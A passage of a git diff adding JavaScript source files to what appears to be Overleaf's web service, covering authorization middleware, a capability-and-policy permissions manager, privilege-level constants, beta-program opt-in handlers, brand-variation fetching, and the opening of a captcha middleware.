isRestrictedUserForProject: callbackify(isRestrictedUserForProject), + isUserSiteAdmin: callbackify(isUserSiteAdmin), + promises: { + canUserReadProject, + canUserWriteProjectContent, + canUserWriteOrReviewProjectContent, + canUserDeleteOrResolveThread, + canUserWriteProjectSettings, + canUserRenameProject, + canUserAdminProject, + getPrivilegeLevelForProject, + isRestrictedUserForProject, + isUserSiteAdmin, + }, +} diff --git a/services/web/app/src/Features/Authorization/AuthorizationMiddleware.js b/services/web/app/src/Features/Authorization/AuthorizationMiddleware.js new file mode 100644 index 0000000..0204344 --- /dev/null +++ b/services/web/app/src/Features/Authorization/AuthorizationMiddleware.js @@ -0,0 +1,292 @@ +const AuthorizationManager = require('./AuthorizationManager') +const logger = require('@overleaf/logger') +const { ObjectId } = require('mongodb-legacy') +const Errors = require('../Errors/Errors') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const AuthenticationController = require('../Authentication/AuthenticationController') +const SessionManager = require('../Authentication/SessionManager') +const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') +const { expressify } = require('@overleaf/promise-utils') +const { + canRedirectToAdminDomain, +} = require('../Helpers/AdminAuthorizationHelper') +const { getSafeAdminDomainRedirect } = require('../Helpers/UrlHelper') + +function _handleAdminDomainRedirect(req, res) { + if (canRedirectToAdminDomain(SessionManager.getSessionUser(req.session))) { + logger.warn({ req }, 'redirecting admin user to admin domain') + res.redirect(getSafeAdminDomainRedirect(req.originalUrl)) + return true + } + return false +} + +async function ensureUserCanReadMultipleProjects(req, res, next) { + const projectIds = (req.query.project_ids || '').split(',') + const userId = _getUserId(req) + for (const projectId of projectIds) { + const token = TokenAccessHandler.getRequestToken(req, projectId) + const canRead = await AuthorizationManager.promises.canUserReadProject( + userId, + projectId, + token + ) + if (!canRead) { + return _redirectToRestricted(req, res, next) + } + } + next() +} + +async function blockRestrictedUserFromProject(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + const isRestrictedUser = + await AuthorizationManager.promises.isRestrictedUserForProject( + userId, + projectId, + token + ) + if (isRestrictedUser) { + return HttpErrorHandler.forbidden(req, res) + } + next() +} + +async function ensureUserCanReadProject(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + const canRead = await AuthorizationManager.promises.canUserReadProject( + userId, + projectId, + token + ) + if (canRead) { + logger.debug({ userId, projectId }, 'allowing user read access to project') + return next() + } + logger.debug({ userId, projectId }, 'denying user read access to project') + HttpErrorHandler.forbidden(req, res) +} + +async function ensureUserCanWriteProjectSettings(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + + if (req.body.name != null) { + const canRename = await AuthorizationManager.promises.canUserRenameProject( + userId, + projectId, + token + ) + if (!canRename) { + return HttpErrorHandler.forbidden(req, res) + } + } + + const otherParams = Object.keys(req.body).filter(x => x !== 'name') + if (otherParams.length > 0) { + const canWrite = + await AuthorizationManager.promises.canUserWriteProjectSettings( + userId, + projectId, + token + ) + if (!canWrite) { + return HttpErrorHandler.forbidden(req, res) + } + } + + next() +} + +async function ensureUserCanDeleteOrResolveThread(req, res, next) { + const projectId = _getProjectId(req) + const docId = _getDocId(req) + const threadId = _getThreadId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + const canDeleteThread = + await AuthorizationManager.promises.canUserDeleteOrResolveThread( + userId, + projectId, + docId, + threadId, + token + ) + if (canDeleteThread) { + logger.debug( + { userId, projectId }, + 'allowing user to delete or resolve a comment thread' + ) + return next() + } + + logger.debug( + { userId, projectId, threadId }, + 'denying user to delete or resolve a comment thread' + ) + return HttpErrorHandler.forbidden(req, res) +} + +async function ensureUserCanWriteProjectContent(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + const canWrite = + await AuthorizationManager.promises.canUserWriteProjectContent( + userId, + projectId, + token + ) + if (canWrite) { + logger.debug( + { userId, projectId }, + 'allowing user write access to project content' + ) + return next() + } + logger.debug( + { userId, projectId }, + 'denying user write access to project settings' + ) + HttpErrorHandler.forbidden(req, res) +} + +async function ensureUserCanWriteOrReviewProjectContent(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + + const canWriteOrReviewProjectContent = + await AuthorizationManager.promises.canUserWriteOrReviewProjectContent( + userId, + projectId, + token + ) + if (canWriteOrReviewProjectContent) { + logger.debug( + { userId, projectId }, + 'allowing user write or review access to project content' + ) + return next() + } + + logger.debug( + { userId, projectId }, + 'denying user write or review access to project content' + ) + return HttpErrorHandler.forbidden(req, res) +} + +async function ensureUserCanAdminProject(req, res, next) { + const projectId = _getProjectId(req) + const userId = _getUserId(req) + const token = TokenAccessHandler.getRequestToken(req, projectId) + const canAdmin = await AuthorizationManager.promises.canUserAdminProject( + userId, + projectId, + token + ) + if (canAdmin) { + logger.debug({ userId, projectId }, 'allowing user admin access to project') + return next() + } + logger.debug({ userId, projectId }, 'denying user admin access to project') + HttpErrorHandler.forbidden(req, res) +} + +async function ensureUserIsSiteAdmin(req, res, next) { + const userId = _getUserId(req) + if (await AuthorizationManager.promises.isUserSiteAdmin(userId)) { + logger.debug({ userId }, 'allowing user admin access to site') + return next() + } + if (_handleAdminDomainRedirect(req, res)) return + logger.debug({ userId }, 'denying user admin access to site') + _redirectToRestricted(req, res, next) +} + +function _getProjectId(req) { + const projectId = req.params.project_id || req.params.Project_id + if (!projectId) { + throw new Error('Expected project_id in request parameters') + } + if (!ObjectId.isValid(projectId)) { + throw new Errors.NotFoundError(`invalid projectId: ${projectId}`) + } + return projectId +} + +function _getDocId(req) { + const docId = req.params.doc_id + if (!docId) { + throw new Error('Expected doc_id in request parameters') + } + if (!ObjectId.isValid(docId)) { + throw new Errors.NotFoundError(`invalid docId: ${docId}`) + } + return docId +} + +function _getThreadId(req) { + const threadId = req.params.thread_id + if (!threadId) { + throw new Error('Expected thread_id in request parameters') + } + if (!ObjectId.isValid(threadId)) { + throw new Errors.NotFoundError(`invalid threadId: ${threadId}`) + } + return threadId +} + +function _getUserId(req) { + return ( + SessionManager.getLoggedInUserId(req.session) || + (req.oauth_user && req.oauth_user._id) || + null + ) +} + +function _redirectToRestricted(req, res, next) { + // TODO: move this to throwing ForbiddenError + res.redirect(`/restricted?from=${encodeURIComponent(res.locals.currentUrl)}`) +} + +function restricted(req, res, next) { + if (SessionManager.isUserLoggedIn(req.session)) { + return res.render('user/restricted', { title: 'restricted' }) + } + const { from } = req.query + logger.debug({ from }, 'redirecting to login') + if (from) { + AuthenticationController.setRedirectInSession(req, from) + } + res.redirect('/login') +} + +module.exports = { + ensureUserCanReadMultipleProjects: expressify( + ensureUserCanReadMultipleProjects + ), + blockRestrictedUserFromProject: expressify(blockRestrictedUserFromProject), + ensureUserCanReadProject: expressify(ensureUserCanReadProject), + ensureUserCanWriteProjectSettings: expressify( + ensureUserCanWriteProjectSettings + ), + ensureUserCanDeleteOrResolveThread: expressify( + ensureUserCanDeleteOrResolveThread + ), + ensureUserCanWriteProjectContent: expressify( + ensureUserCanWriteProjectContent + ), + ensureUserCanWriteOrReviewProjectContent: expressify( + ensureUserCanWriteOrReviewProjectContent + ), + ensureUserCanAdminProject: expressify(ensureUserCanAdminProject), + ensureUserIsSiteAdmin: expressify(ensureUserIsSiteAdmin), + restricted, +} diff --git a/services/web/app/src/Features/Authorization/PermissionsController.js b/services/web/app/src/Features/Authorization/PermissionsController.js new file mode 100644 index 0000000..c9ffac3 --- /dev/null +++ b/services/web/app/src/Features/Authorization/PermissionsController.js @@ -0,0 +1,103 @@ +const { ForbiddenError, UserNotFoundError } = require('../Errors/Errors') +const { + getUserCapabilities, + getUserRestrictions, + combineGroupPolicies, + combineAllowedProperties, +} = require('./PermissionsManager') +const { assertUserPermissions } = require('./PermissionsManager').promises +const Modules = require('../../infrastructure/Modules') +const { expressify } = require('@overleaf/promise-utils') +const Features = require('../../infrastructure/Features') + +/** + * Function that returns middleware to add an `assertPermission` function to the request object to check if the user has a specific capability. + * @returns {Function} The middleware function that adds the `assertPermission` function to the request object. + */ +function useCapabilities() { + const middleware = async function (req, res, next) { + // attach the user's capabilities to the request object + req.capabilitySet = new Set() + // provide a function to assert that a capability is present + req.assertPermission = capability => { + if (!req.capabilitySet.has(capability)) { + throw new ForbiddenError( + `user does not have permission for ${capability}` + ) + } + } + if (!req.user) { + return next() + } + try { + let results = await Modules.promises.hooks.fire( + 'getGroupPolicyForUser', + req.user + ) + // merge array of all results from all modules + results = results.flat() + + if (results.length > 0) { + // get the combined group policy applying to the user + const groupPolicies = results.map(result => result.groupPolicy) + const combinedGroupPolicy = combineGroupPolicies(groupPolicies) + // attach the new capabilities to the request object + for (const cap of getUserCapabilities(combinedGroupPolicy)) { + req.capabilitySet.add(cap) + } + // also attach the user's restrictions (the capabilities they don't have) + req.userRestrictions = getUserRestrictions(combinedGroupPolicy) + + // attach allowed properties to the request object + const allowedProperties = combineAllowedProperties(results) + for (const [prop, value] of Object.entries(allowedProperties)) { + req[prop] = value + } + } + next() + } catch (error) { + if (error instanceof UserNotFoundError) { + // the user is logged in but doesn't exist in the database + // this can happen if the user has just deleted their account + return next() + } else { + next(error) + } + } + } + return expressify(middleware) +} + +/** + * Function that returns middleware to check if the user has permission to access a resource. + * @param {[string]} requiredCapabilities - the capabilities required to access the resource. + * @returns {Function} The middleware function that checks if the user has the required capabilities. + */ +function requirePermission(...requiredCapabilities) { + if ( + requiredCapabilities.length === 0 || + requiredCapabilities.some(capability => typeof capability !== 'string') + ) { + throw new Error('invalid required capabilities') + } + const doRequest = async function (req, res, next) { + if (!Features.hasFeature('saas')) { + return next() + } + if (!req.user) { + return next(new Error('no user')) + } + try { + await assertUserPermissions(req.user, requiredCapabilities) + next() + } catch (error) { + next(error) + } + } + return doRequest +} + +module.exports = { + requirePermission, + useCapabilities, +} diff --git a/services/web/app/src/Features/Authorization/PermissionsManager.js b/services/web/app/src/Features/Authorization/PermissionsManager.js new file mode 100644 index 0000000..a20280a --- /dev/null +++ b/services/web/app/src/Features/Authorization/PermissionsManager.js @@ -0,0 +1,480 @@ +/** + * This module exports functions for managing permissions and policies. + * + * It provides a way to: + * + * - Register capabilities and policies + * - Associate policies with custom validators + * - Apply collections of policies to a user + * - Check whether a user has a given capability + * - Check whether a user complies with a given policy + * + * Capabilities: boolean values that represent whether a user is allowed to + * perform a certain action or not. The capabilities are represented as a Set. + * For example, to delete their account a user would need the + * `delete-own-account` capability. A user starts with a set of default + * capabilities that let them do all the things they can currently do in + * Overleaf. + * + * Policy: a rule which specifies which capabilities will be removed from a user + * when the policy is applied. + * + * For example, a policy `userCannotDeleteOwnAccount` is represented as + * `{'delete-own-account' : false}` meaning that the `delete-own-account` + * capability will be removed. A policy can remove more than one capability, and + * more than one policy could apply to a user. + * + * Validator: a function that takes an object with user and subscription properties + * and returns a boolean indicating whether the user satisfies the policy or not. + * For example, a validator for the `userCannotHaveSecondaryEmail` policy would + * check whether the user has more than one email address. + * + * Group Policies: a collection of policies with a setting indicating whether + * they are enforced or not. Used to place restrictions on managed users in a + * group. + * + * For example, a group policy could be + * + * { + * "userCannotDeleteOwnAccount": true, // enforced + * "userCannotHaveSecondaryEmail": false // not enforced + * } + */ + +const { callbackify } = require('util') +const { ForbiddenError } = require('../Errors/Errors') +const Modules = require('../../infrastructure/Modules') + +const POLICY_TO_CAPABILITY_MAP = new Map() +const POLICY_TO_VALIDATOR_MAP = new Map() +const DEFAULT_PERMISSIONS = new Map() +const ALLOWED_PROPERTIES = new Set() + +/** + * Throws an error if the given capability is not registered. + * + * @private + * @param {string} capability - The name of the capability to check. + * @throws {Error} If the capability is not registered. + */ +function ensureCapabilityExists(capability) { + if (!DEFAULT_PERMISSIONS.has(capability)) { + throw new Error(`unknown capability: ${capability}`) + } +} + +/** + * Validates an group policy object + * + * @param {Object} policies - An object containing policy names and booleans + * as key-value entries. + * @throws {Error} if the `policies` object contains a policy that is not + * registered, or the policy value is not a boolean + */ +function validatePolicies(policies) { + for (const [policy, value] of Object.entries(policies)) { + if (!POLICY_TO_CAPABILITY_MAP.has(policy)) { + throw new Error(`unknown policy: ${policy}`) + } + if (typeof value !== 'boolean') { + throw new Error(`policy value must be a boolean: ${policy} = ${value}`) + } + } +} + +/** + * Registers a new capability with the given name and options. + * + * @param {string} name - The name of the capability to register. + * @param {Object} options - The options for the capability. + * @param {boolean} options.default - The default value for the capability + * (required). + * @throws {Error} If the default value is not a boolean or if the capability is + * already registered. + */ +function registerCapability(name, options) { + // check that the default value is a boolean + const defaultValue = options?.default + if (typeof defaultValue !== 'boolean') { + throw new Error('default value must be a boolean') + } + if (DEFAULT_PERMISSIONS.has(name)) { + throw new Error(`capability already registered: ${name}`) + } + DEFAULT_PERMISSIONS.set(name, defaultValue) +} + +/** + * Registers a new policy with the given name, capabilities, and options. + * + * @param {string} name - The name of the policy to register. + * @param {Object} capabilities - The capabilities for the policy. + * @param {Object} [options] - The options for the policy. + * @param {Function?} [options.validator] - The optional validator function for the + * policy. + * @throws {Error} If the policy is already registered or if a capability is not + * a boolean or is unknown. + */ +function registerPolicy(name, capabilities, options = {}) { + const { validator } = options + // check that the only options provided are capabilities and validators + // FIXME: maybe use a schema validator here? + if (POLICY_TO_CAPABILITY_MAP.has(name)) { + throw new Error(`policy already registered: ${name}`) + } + // check that all the entries in the capability set exist and are booleans + for (const [capabilityName, capabilityValue] of Object.entries( + capabilities + )) { + // check that the capability exists (look in the default permissions) + if (!DEFAULT_PERMISSIONS.has(capabilityName)) { + throw new Error(`unknown capability: ${capabilityName}`) + } + // check that the value is a boolean + if (typeof capabilityValue !== 'boolean') { + throw new Error( + `capability value must be a boolean: ${capabilityName} = ${capabilityValue}` + ) + } + } + // set the policy capabilities + POLICY_TO_CAPABILITY_MAP.set(name, new Map(Object.entries(capabilities))) + + // set the policy validator (if present) + if (validator) { + POLICY_TO_VALIDATOR_MAP.set(name, validator) + } +} + +/** + * Registers an allowed property that can be added to the request object. + * + * @param {string} name - The name of the property to register. + * @returns {void} + */ +function registerAllowedProperty(name) { + ALLOWED_PROPERTIES.add(name) +} + +/** + * returns the set of allowed properties that have been registered + * + * @returns {Set} ALLOWED_PROPERTIES + */ +function getAllowedProperties() { + return ALLOWED_PROPERTIES +} +/** + * Returns an array of policy names that are enforced based on the provided + * group policy object. + * + * @private + * @param {Object} groupPolicy - The group policy object to check. + * @returns {Array} An array of policy names that are enforced. + */ +function getEnforcedPolicyNames(groupPolicy = {}) { + if (!groupPolicy) { + return [] + } + return Object.keys( + typeof groupPolicy.toObject === 'function' + ? groupPolicy.toObject() + : groupPolicy + ).filter( + policyName => + !['__v', '_id'].includes(policyName) && groupPolicy[policyName] !== false + ) // filter out the policies that are not enforced +} + +/** + * Returns the value of the specified capability for the given policy. + * + * @private + * @param {string} policyName - The name of the policy to retrieve the + * capability value from. + * @param {string} capability - The name of the capability to retrieve the value + * for. + * @returns {boolean | undefined} The value of the capability for the policy, or + * undefined if the policy or capability is not found. + */ +function getCapabilityValueFromPolicy(policyName, capability) { + return POLICY_TO_CAPABILITY_MAP.get(policyName)?.get(capability) +} + +/** + * Returns the default value for the specified capability. + * + * @private + * @param {string} capability - The name of the capability to retrieve the + * default value for. + * @returns {boolean | undefined} The default value for the capability, or + * undefined if the capability is not found. + */ +function getDefaultPermission(capability) { + return DEFAULT_PERMISSIONS.get(capability) +} + +function getValidatorFromPolicy(policyName) { + return POLICY_TO_VALIDATOR_MAP.get(policyName) +} + +/** + * Returns a set of default capabilities based on the DEFAULT_PERMISSIONS map. + * + * @private + * @returns {Set} A set of default capabilities. + */ +function getDefaultCapabilities() { + const defaultCapabilities = new Set() + for (const [ + capabilityName, + capabilityValue, + ] of DEFAULT_PERMISSIONS.entries()) { + if (capabilityValue === true) { + defaultCapabilities.add(capabilityName) + } + } + return defaultCapabilities +} + +/** + * Applies a given policy to a set of capabilities, to remove those capabilities + * which are not allowed by the policy. + * + * @private + * @param {Set} capabilitySet - The set of capabilities to apply the policy to. + * @param {string} policyName - The name of the policy to apply. + * @throws {Error} If the policy is unknown. + */ +function applyPolicy(capabilitySet, policyName) { + const policyCapabilities = POLICY_TO_CAPABILITY_MAP.get(policyName) + if (!policyCapabilities) { + throw new Error(`unknown policy: ${policyName}`) + } + for (const [ + capabilityName, + capabilityValue, + ] of policyCapabilities.entries()) { + if (capabilityValue !== true) { + capabilitySet.delete(capabilityName) + } + } +} + +/** + * Returns a set of capabilities that a user has based on their group policy. + * + * @param {Object} groupPolicy - The group policy object to check. + * @returns {Set} A set of capabilities that the user has, based on their group + * policy. + * @throws {Error} If the policy is unknown. + */ +function getUserCapabilities(groupPolicy) { + const userCapabilities = getDefaultCapabilities() + const enforcedPolicyNames = getEnforcedPolicyNames(groupPolicy) + for (const enforcedPolicyName of enforcedPolicyNames) { + applyPolicy(userCapabilities, enforcedPolicyName) + } + return userCapabilities +} + +/** + * Combines an array of group policies into a single policy object. + * + * @param {Array} groupPolicies - An array of group policies. + * @returns {Object} - The combined group policy object. + */ +function combineGroupPolicies(groupPolicies) { + const combinedGroupPolicy = {} + for (const groupPolicy of groupPolicies) { + const enforcedPolicyNames = getEnforcedPolicyNames(groupPolicy) + for (const enforcedPolicyName of enforcedPolicyNames) { + combinedGroupPolicy[enforcedPolicyName] = true + } + } + return combinedGroupPolicy +} + +/** + * Combines the allowed properties from an array of property objects. + * + * @param {Array<Object>} propertyObjects - An array of property objects. + * @returns {Object} - An object containing the combined allowed properties. + */ +function combineAllowedProperties(propertyObjects) { + const userProperties = {} + for (const properties of propertyObjects) { + for (const [key, value] of Object.entries(properties)) { + if (ALLOWED_PROPERTIES.has(key)) { + userProperties[key] ??= value + } + } + } + return userProperties +} + +/** + * Returns a set of capabilities that a user does not have based on their group policy. + * + * @param {Object} groupPolicy - The group policy object to check. + * @returns {Set} A set of capabilities that the user does not have, based on their group + * policy. + * @throws {Error} If the policy is unknown. + */ +function getUserRestrictions(groupPolicy) { + const userCapabilities = getUserCapabilities(groupPolicy) + const userRestrictions = getDefaultCapabilities() + for (const capability of userCapabilities) { + userRestrictions.delete(capability) + } + return userRestrictions +} + +/** + * Checks if a user has permission for a given capability based on their group + * policy. + * + * @param {Object} groupPolicy - The group policy object for the user. + * @param {string} capability - The name of the capability to check permission + * for. + * @returns {boolean} True if the user has permission for the capability, false + * otherwise. + * @throws {Error} If the capability does not exist. + */ +function hasPermission(groupPolicy, capability) { + ensureCapabilityExists(capability) + // look through all the entries in the group policy and see if any of them apply to the capability + const results = getEnforcedPolicyNames(groupPolicy).map(userPolicyName => + getCapabilityValueFromPolicy(userPolicyName, capability) + ) + // if there are no results, or none of the policies apply, return the default permission + if (results.length === 0 || results.every(result => result === undefined)) { + return getDefaultPermission(capability) + } + // only allow the permission if all the results are true, otherwise deny it + return results.every(result => result === true) +} + +/** + * Asynchronously checks which policies a user complies with using the + * applicable validators. Each validator is an async function that takes an object + * with user, groupPolicy, and subscription properties and returns a boolean. + * + * @param {Object} options - The options object. + * @param {Object} options.user - The user object to check. + * @param {Object} options.groupPolicy - The group policy object to check. + * @param {Object} options.subscription - The subscription object for the group policy. + * @returns {Promise<Map>} A promise that resolves with a Map object containing + * the validation status for each enforced policy. The keys of the Map are the + * enforced policy names, and the values are booleans indicating whether the + * user complies with the policy. + */ +async function getUserValidationStatus({ user, groupPolicy, subscription }) { + // find all the enforced policies for the user + const enforcedPolicyNames = getEnforcedPolicyNames(groupPolicy) + // for each enforced policy, we have a list of capabilities with expected values + // some of those capabilities have validators + // we need to run the validators and the result to see if if the user is complies with the policy + const userValidationStatus = new Map() + for (const enforcedPolicyName of enforcedPolicyNames) { + const validator = getValidatorFromPolicy(enforcedPolicyName) + if (validator) { + userValidationStatus.set( + enforcedPolicyName, + await validator({ user, subscription }) + ) + } + } + return userValidationStatus +} + +/** + * asserts that a user has permission for a given set of capabilities + * as set out in both their current group subscription, and any institutions they are affiliated with, + * throwing an ForbiddenError if they do not + * + * @param {Object} user - The user object to retrieve the group policy for. + * Only the user's _id is required + * @param {Array} capabilities - The list of the capabilities to check permission for. + * @returns {Promise<void>} + * @throws {Error} If the user does not have permission + */ +async function assertUserPermissions(user, requiredCapabilities) { + const hasAllPermissions = await checkUserPermissions( + user, + requiredCapabilities + ) + if (!hasAllPermissions) { + throw new ForbiddenError( + `user does not have one or more permissions within ${requiredCapabilities}` + ) + } +} + +/** + * Checks if a user has permission for a given set of capabilities + * as set out in both their current group subscription, and any institutions they are affiliated with + * + * @param {Object} user - The user object to retrieve the group policy for. + * Only the user's _id is required + * @param {Array} capabilities - The list of the capabilities to check permission for. + * @returns {Promise<Boolean>} - true if the user has all permissions, false if not + */ +async function checkUserPermissions(user, requiredCapabilities) { + let results = await Modules.promises.hooks.fire('getGroupPolicyForUser', user) + results = results.flat() + if (!results?.length) return true + + // get the combined group policy applying to the user + const groupPolicies = results.map(result => result.groupPolicy) + const combinedGroupPolicy = combineGroupPolicies(groupPolicies) + for (const requiredCapability of requiredCapabilities) { + // if the user has the permission, continue + if (!hasPermission(combinedGroupPolicy, requiredCapability)) { + return false + } + } + return true +} + +/** + * checks if all collaborators of a given project have the specified capability, including the owner + * + * @async + * @function checkUserListPermissions + * @param {Object[]} userList - An array of all user to check permissions for + * @param {Array} capabilities - The list of the capabilities to check permission for. + * @returns {Promise<boolean>} - A promise that resolves to `true` if all collaborators have the specified capability, otherwise `false`. + */ +async function checkUserListPermissions(userList, capabilities) { + for (const user of userList) { + // mimic a user object with only id, since we need it to fetch permissions + const allowed = await checkUserPermissions(user, capabilities) + if (!allowed) { + return false + } + } + return true +} + +module.exports = { + validatePolicies, + registerCapability, + registerPolicy, + registerAllowedProperty, + combineGroupPolicies, + combineAllowedProperties, + getAllowedProperties, + hasPermission, + getUserCapabilities, + getUserRestrictions, + getUserValidationStatus: callbackify(getUserValidationStatus), + checkCollaboratorsPermission: callbackify(checkUserListPermissions), + checkUserPermissions: callbackify(checkUserPermissions), + promises: { + assertUserPermissions, + getUserValidationStatus, + checkUserListPermissions, + checkUserPermissions, + }, +} diff --git a/services/web/app/src/Features/Authorization/PrivilegeLevels.js b/services/web/app/src/Features/Authorization/PrivilegeLevels.js new file mode 100644 index 0000000..ff03cf8 --- /dev/null +++ b/services/web/app/src/Features/Authorization/PrivilegeLevels.js @@ -0,0 +1,9 @@ +const PrivilegeLevels = { + NONE: false, + READ_ONLY: 'readOnly', + READ_AND_WRITE: 'readAndWrite', + REVIEW: 'review', + OWNER: 'owner', +} + +module.exports = PrivilegeLevels diff --git a/services/web/app/src/Features/Authorization/PublicAccessLevels.js b/services/web/app/src/Features/Authorization/PublicAccessLevels.js new file mode 100644 index 0000000..285acd1 --- /dev/null +++ b/services/web/app/src/Features/Authorization/PublicAccessLevels.js @@ -0,0 +1,17 @@ +/** + * Note: + * It used to be that `project.publicAccessLevel` could be set to `private`, + * `readOnly` or `readAndWrite`, the latter of which made the project publicly + * accessible. + * + * This system was replaced with "link sharing", therafter the valid values are + * `private` or `tokenBased`. While it is no longer possible to set + * `publicAccessLevel` to the legacy values, there are projects in the system + * that already have those values set. + */ +module.exports = { + READ_ONLY: 'readOnly', // LEGACY + READ_AND_WRITE: 'readAndWrite', // LEGACY + PRIVATE: 'private', + TOKEN_BASED: 'tokenBased', +} diff --git a/services/web/app/src/Features/Authorization/Sources.js b/services/web/app/src/Features/Authorization/Sources.js new file mode 100644 index 0000000..e84126a --- /dev/null +++ b/services/web/app/src/Features/Authorization/Sources.js @@ -0,0 +1,5 @@ +module.exports = { + INVITE: 'invite', + TOKEN: 'token', + OWNER: 'owner', +} diff --git a/services/web/app/src/Features/BetaProgram/BetaProgramController.mjs b/services/web/app/src/Features/BetaProgram/BetaProgramController.mjs new file mode 100644 index 0000000..c7df6da --- /dev/null +++ b/services/web/app/src/Features/BetaProgram/BetaProgramController.mjs @@ -0,0 +1,57 @@ +import BetaProgramHandler from './BetaProgramHandler.mjs' +import OError from '@overleaf/o-error' +import UserGetter from '../User/UserGetter.js' +import logger from '@overleaf/logger' +import SessionManager from '../Authentication/SessionManager.js' +import SplitTestSessionHandler from '../SplitTests/SplitTestSessionHandler.js' +import { expressify } from '@overleaf/promise-utils' + +async function optIn(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + await BetaProgramHandler.promises.optIn(userId) + try { + await SplitTestSessionHandler.promises.sessionMaintenance(req, null) + } catch (error) { + logger.error( + { err: error }, + 'Failed to perform session maintenance after beta program opt in' + ) + } + res.redirect('/beta/participate') +} + +async function optOut(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + await BetaProgramHandler.promises.optOut(userId) + try { + await SplitTestSessionHandler.promises.sessionMaintenance(req, null) + } catch (error) { + logger.error( + { err: error }, + 'Failed to perform session maintenance after beta program opt out' + ) + } + res.redirect('/beta/participate') +} + +async function optInPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + let user + try { + user = await UserGetter.promises.getUser(userId, { betaProgram: 1 }) + } catch (error) { + throw OError.tag(error, 'error fetching user', { + userId, + }) + } + res.render('beta_program/opt_in', { + title: 'sharelatex_beta_program', + user, + }) +} + +export default { + optIn: expressify(optIn), + optOut: expressify(optOut), + optInPage: expressify(optInPage), +} diff --git a/services/web/app/src/Features/BetaProgram/BetaProgramHandler.mjs b/services/web/app/src/Features/BetaProgram/BetaProgramHandler.mjs new file mode 100644 index 0000000..74270ea --- /dev/null +++ b/services/web/app/src/Features/BetaProgram/BetaProgramHandler.mjs @@ -0,0 +1,35 @@ +import { callbackify } from 'node:util' +import metrics from '@overleaf/metrics' +import UserUpdater from '../User/UserUpdater.js' +import AnalyticsManager from '../Analytics/AnalyticsManager.js' + +async function optIn(userId) { + await UserUpdater.promises.updateUser(userId, { $set: { betaProgram: true } }) + metrics.inc('beta-program.opt-in') + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'beta-program', + true + ) +} + +async function optOut(userId) { + await UserUpdater.promises.updateUser(userId, { + $set: { betaProgram: false }, + }) + metrics.inc('beta-program.opt-out') + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'beta-program', + false + ) +} + +export default { + optIn: callbackify(optIn), + optOut: callbackify(optOut), + promises: { + optIn, + optOut, + }, +} diff --git a/services/web/app/src/Features/BrandVariations/BrandVariationsHandler.js b/services/web/app/src/Features/BrandVariations/BrandVariationsHandler.js new file mode 100644 index 0000000..942fa3a --- /dev/null +++ b/services/web/app/src/Features/BrandVariations/BrandVariationsHandler.js @@ -0,0 +1,86 @@ +const OError = require('@overleaf/o-error') +const { URL } = require('url') +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const V1Api = require('../V1/V1Api') +const sanitizeHtml = require('sanitize-html') +const { promisify } = require('@overleaf/promise-utils') + +module.exports = { + getBrandVariationById, + promises: { + getBrandVariationById: promisify(getBrandVariationById), + }, +} + +function getBrandVariationById(brandVariationId, callback) { + if (brandVariationId == null || brandVariationId === '') { + return callback(new Error('Branding variation id not provided')) + } + logger.debug({ brandVariationId }, 'fetching brand variation details from v1') + V1Api.request( + { + uri: `/api/v2/brand_variations/${brandVariationId}`, + }, + function (error, response, brandVariationDetails) { + if (error != null) { + OError.tag(error, 'error getting brand variation details', { + brandVariationId, + }) + return callback(error) + } + formatBrandVariationDetails(brandVariationDetails) + sanitizeBrandVariationDetails(brandVariationDetails) + callback(null, brandVariationDetails) + } + ) +} + +function formatBrandVariationDetails(details) { + if (details.export_url != null) { + details.export_url = setV1AsHostIfRelativeURL(details.export_url) + } + if (details.home_url != null) { + details.home_url = setV1AsHostIfRelativeURL(details.home_url) + } + if (details.logo_url != null) { + details.logo_url = setV1AsHostIfRelativeURL(details.logo_url) + } + if (details.journal_guidelines_url != null) { + details.journal_guidelines_url = setV1AsHostIfRelativeURL( + details.journal_guidelines_url + ) + } + if (details.journal_cover_url != null) { + details.journal_cover_url = setV1AsHostIfRelativeURL( + details.journal_cover_url + ) + } + if (details.submission_confirmation_page_logo_url != null) { + details.submission_confirmation_page_logo_url = setV1AsHostIfRelativeURL( + details.submission_confirmation_page_logo_url + ) + } + if (details.publish_menu_icon != null) { + details.publish_menu_icon = setV1AsHostIfRelativeURL( + details.publish_menu_icon + ) + } +} + +function sanitizeBrandVariationDetails(details) { + if (details.submit_button_html) { + details.submit_button_html = sanitizeHtml( + details.submit_button_html, + settings.modules.sanitize.options + ) + } +} + +function setV1AsHostIfRelativeURL(urlString) { + // The first argument is the base URL to resolve against if the second argument is not absolute. + // As it only applies if the second argument is not absolute, we can use it to transform relative URLs into + // absolute ones using v1 as the host. If the URL is absolute (e.g. a filepicker one), then the base + // argument is just ignored + return new URL(urlString, settings.apis.v1.publicUrl).href +} diff --git a/services/web/app/src/Features/Captcha/CaptchaMiddleware.js b/services/web/app/src/Features/Captcha/CaptchaMiddleware.js new file mode 100644 index 0000000..9c93b74 --- /dev/null +++ b/services/web/app/src/Features/Captcha/CaptchaMiddleware.js @@ -0,0 +1,119 @@ +const { fetchJson } = require('@overleaf/fetch-utils') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const OError = require('@overleaf/o-error') +const DeviceHistory = require('./DeviceHistory') +const AuthenticationController = require('../Authentication/AuthenticationController') +const { expressify } = require('@overleaf/promise-utils') +const EmailsHelper = require('../Helpers/EmailHelper') + +function respondInvalidCaptcha(req, res) { + res.status(400).json({ + errorReason: 'cannot_verify_user_not_robot', + message: { + text: req.i18n.translate('cannot_verify_user_not_robot'), + }, + }) +} + 